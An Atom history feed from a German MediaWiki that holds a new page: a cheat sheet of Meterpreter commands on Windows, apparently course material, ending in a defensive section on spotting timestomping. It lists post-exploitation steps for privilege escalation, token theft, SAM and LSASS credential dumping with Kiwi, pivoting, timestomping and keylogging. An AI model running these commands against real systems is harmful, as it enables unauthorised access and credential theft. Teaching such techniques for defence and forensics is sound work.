<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://xinux.net/index.php?action=history&amp;feed=atom&amp;title=Meterpreter_unter_Windows</id>
	<title>Meterpreter unter Windows - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://xinux.net/index.php?action=history&amp;feed=atom&amp;title=Meterpreter_unter_Windows"/>
	<link rel="alternate" type="text/html" href="https://xinux.net/index.php?title=Meterpreter_unter_Windows&amp;action=history"/>
	<updated>2026-08-23T15:04:22Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://xinux.net/index.php?title=Meterpreter_unter_Windows&amp;diff=72695&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „== Grundsätzliches ==  Meterpreter ist die interaktive Payload des Metasploit-Frameworks. Sie läuft im Speicher des kompromittierten Prozesses und stellt ein…“</title>
		<link rel="alternate" type="text/html" href="https://xinux.net/index.php?title=Meterpreter_unter_Windows&amp;diff=72695&amp;oldid=prev"/>
		<updated>2026-08-14T07:18:28Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „== Grundsätzliches ==  Meterpreter ist die interaktive Payload des Metasploit-Frameworks. Sie läuft im Speicher des kompromittierten Prozesses und stellt ein…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;== Grundsätzliches ==&lt;br /&gt;
&lt;br /&gt;
Meterpreter ist die interaktive Payload des Metasploit-Frameworks. Sie läuft im&lt;br /&gt;
Speicher des kompromittierten Prozesses und stellt einen einheitlichen Befehlssatz&lt;br /&gt;
zur Verfügung. Die Windows-Variante bietet deutlich mehr Kommandos als die&lt;br /&gt;
Linux-Version - vor allem alles rund um Prozess-Tokens, UAC-Bypass, die SAM-Datenbank,&lt;br /&gt;
Zeitstempel-Manipulation und die Kiwi/Mimikatz-Erweiterung.&lt;br /&gt;
&lt;br /&gt;
'''Hinweis:''' Der Befehl &amp;lt;code&amp;gt;help&amp;lt;/code&amp;gt; zeigt in der laufenden Session, welche&lt;br /&gt;
Kommandos der konkrete Payload tatsächlich unterstützt. Erweiterungen wie Kiwi müssen&lt;br /&gt;
erst mit &amp;lt;code&amp;gt;load&amp;lt;/code&amp;gt; nachgeladen werden.&lt;br /&gt;
&lt;br /&gt;
== Session-Verwaltung ==&lt;br /&gt;
&lt;br /&gt;
;Session in den Hintergrund legen, zurück zur msf-Konsole&lt;br /&gt;
*background&lt;br /&gt;
&lt;br /&gt;
;Vorhandene Sessions anzeigen&lt;br /&gt;
*sessions -l&lt;br /&gt;
&lt;br /&gt;
;Session wieder aufnehmen&lt;br /&gt;
*sessions -i ID&lt;br /&gt;
&lt;br /&gt;
;Kontextbezogene Befehlsliste anzeigen&lt;br /&gt;
*help&lt;br /&gt;
&lt;br /&gt;
== System und Recon ==&lt;br /&gt;
&lt;br /&gt;
;Betriebssystem, Architektur, Hostname&lt;br /&gt;
*sysinfo&lt;br /&gt;
&lt;br /&gt;
;Unter welchem Benutzer läuft die Session&lt;br /&gt;
*getuid&lt;br /&gt;
&lt;br /&gt;
;Eigene Prozess-ID&lt;br /&gt;
*getpid&lt;br /&gt;
&lt;br /&gt;
;Prozessliste – Spalte User zeigt, welche Prozesse als SYSTEM laufen&lt;br /&gt;
*ps&lt;br /&gt;
&lt;br /&gt;
;In eine normale System-Shell wechseln (cmd.exe)&lt;br /&gt;
*shell&lt;br /&gt;
&lt;br /&gt;
== Rechteausweitung ==&lt;br /&gt;
&lt;br /&gt;
Die Rechteausweitung ist auf Windows der zentrale Zwischenschritt: Ohne&lt;br /&gt;
NT AUTHORITY\SYSTEM lassen sich weder die SAM-Datenbank noch der LSASS-Prozess auslesen.&lt;br /&gt;
&lt;br /&gt;
;Bekannte lokale Privilege-Escalation-Techniken durchprobieren&lt;br /&gt;
*getsystem&lt;br /&gt;
&lt;br /&gt;
;Neue Identität überprüfen – sollte NT AUTHORITY\SYSTEM zeigen&lt;br /&gt;
*getuid&lt;br /&gt;
&lt;br /&gt;
;UAC umgehen, falls getsystem an fehlender Elevation scheitert&lt;br /&gt;
*run post/windows/gather/win_privs&lt;br /&gt;
&lt;br /&gt;
;In einen als SYSTEM laufenden Prozess wechseln (PID aus ps)&lt;br /&gt;
*migrate 248&lt;br /&gt;
&lt;br /&gt;
;Token eines anderen Prozesses stehlen&lt;br /&gt;
*steal_token 1784&lt;br /&gt;
&lt;br /&gt;
== Zugangsdaten auslesen ==&lt;br /&gt;
&lt;br /&gt;
;Passwort-Hashes aus der SAM-Datenbank (erfordert SYSTEM)&lt;br /&gt;
*hashdump&lt;br /&gt;
&lt;br /&gt;
;Alternative als Post-Modul, robuster auf neueren Systemen&lt;br /&gt;
*run post/windows/gather/hashdump&lt;br /&gt;
&lt;br /&gt;
;Kiwi/Mimikatz-Erweiterung nachladen&lt;br /&gt;
*load kiwi&lt;br /&gt;
&lt;br /&gt;
;Alle im Speicher gefundenen Zugangsdaten (LSASS, erfordert SYSTEM)&lt;br /&gt;
*creds_all&lt;br /&gt;
&lt;br /&gt;
;Nur Kerberos-Tickets&lt;br /&gt;
*creds_kerberos&lt;br /&gt;
&lt;br /&gt;
;Klartext-Passwörter aus dem WDigest-Provider&lt;br /&gt;
*creds_wdigest&lt;br /&gt;
&lt;br /&gt;
== Dateisystem ==&lt;br /&gt;
&lt;br /&gt;
;Verzeichnis anzeigen und wechseln&lt;br /&gt;
*pwd&lt;br /&gt;
*ls&lt;br /&gt;
*cd C:\\Users&lt;br /&gt;
&lt;br /&gt;
;Datei vom Ziel herunterladen&lt;br /&gt;
*download C:\\Users\\Administrator\\Desktop\\daten.xlsx C:\\loot\\&lt;br /&gt;
&lt;br /&gt;
;Datei auf das Ziel hochladen&lt;br /&gt;
*upload werkzeug.exe C:\\Windows\\Temp\\&lt;br /&gt;
&lt;br /&gt;
;Dateien suchen&lt;br /&gt;
*search -f *.kdbx&lt;br /&gt;
&lt;br /&gt;
== Netzwerk und Pivoting ==&lt;br /&gt;
&lt;br /&gt;
;Netzwerk-Interfaces anzeigen&lt;br /&gt;
*ipconfig&lt;br /&gt;
&lt;br /&gt;
;Aktive Verbindungen&lt;br /&gt;
*netstat&lt;br /&gt;
&lt;br /&gt;
;Routing-Tabelle&lt;br /&gt;
*route&lt;br /&gt;
&lt;br /&gt;
;Lokales Port-Forwarding einrichten&lt;br /&gt;
*portfwd add -l 3389 -p 3389 -r 10.254.31.50&lt;br /&gt;
&lt;br /&gt;
;Route über die Session für weitere Module setzen&lt;br /&gt;
*run autoroute -s 10.254.31.0/24&lt;br /&gt;
&lt;br /&gt;
== Persistenz und Anti-Forensik ==&lt;br /&gt;
&lt;br /&gt;
;Zeitstempel einer Datei manipulieren (Timestomping)&lt;br /&gt;
*timestomp C:\\Windows\\Temp\\payload.exe -m &amp;quot;01/01/2020 10:00:00&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;Zeitstempel einer Referenzdatei übernehmen&lt;br /&gt;
*timestomp C:\\payload.exe -f C:\\Windows\\notepad.exe&lt;br /&gt;
&lt;br /&gt;
;Keylogger im aktuellen Prozess starten&lt;br /&gt;
*keyscan_start&lt;br /&gt;
&lt;br /&gt;
;Screenshot der aktiven Sitzung&lt;br /&gt;
*screenshot&lt;br /&gt;
&lt;br /&gt;
== Unterschiede zur Linux-Variante ==&lt;br /&gt;
&lt;br /&gt;
Die folgenden Kommandos existieren nur unter Windows, weil sie an&lt;br /&gt;
Windows-Mechanismen gebunden sind:&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;getsystem&amp;lt;/code&amp;gt; / &amp;lt;code&amp;gt;steal_token&amp;lt;/code&amp;gt; – Token-basierte Rechteausweitung&lt;br /&gt;
* &amp;lt;code&amp;gt;hashdump&amp;lt;/code&amp;gt; – SAM-Datenbank (unter Linux: &amp;lt;code&amp;gt;/etc/shadow&amp;lt;/code&amp;gt; per Post-Modul)&lt;br /&gt;
* &amp;lt;code&amp;gt;load kiwi&amp;lt;/code&amp;gt; / &amp;lt;code&amp;gt;creds_all&amp;lt;/code&amp;gt; – LSASS-Credential-Dumping&lt;br /&gt;
* &amp;lt;code&amp;gt;timestomp&amp;lt;/code&amp;gt; – Zeitstempel-Manipulation (unter Linux: &amp;lt;code&amp;gt;touch -d&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;keyscan_start&amp;lt;/code&amp;gt; / &amp;lt;code&amp;gt;screenshot&amp;lt;/code&amp;gt; – GUI-nahe Funktionen&lt;br /&gt;
&lt;br /&gt;
== Bezug zum Forensik-Szenario ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;timestomp&amp;lt;/code&amp;gt; ist der direkte Gegenspieler zur Timeline-Analyse mit dem&lt;br /&gt;
Sleuth Kit: Ein Angreifer setzt damit die MACB-Zeitstempel zurück, um die eigene&lt;br /&gt;
Tatzeit zu verschleiern. Für die Verteidigung ist wichtig, dass Timestomping nur die&lt;br /&gt;
Zeitstempel im Standard-Attribut ($STANDARD_INFORMATION) verändert, während NTFS die&lt;br /&gt;
Originalwerte im $FILE_NAME-Attribut behält – ein aufmerksamer Ermittler erkennt die&lt;br /&gt;
Manipulation an der Diskrepanz zwischen beiden.&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>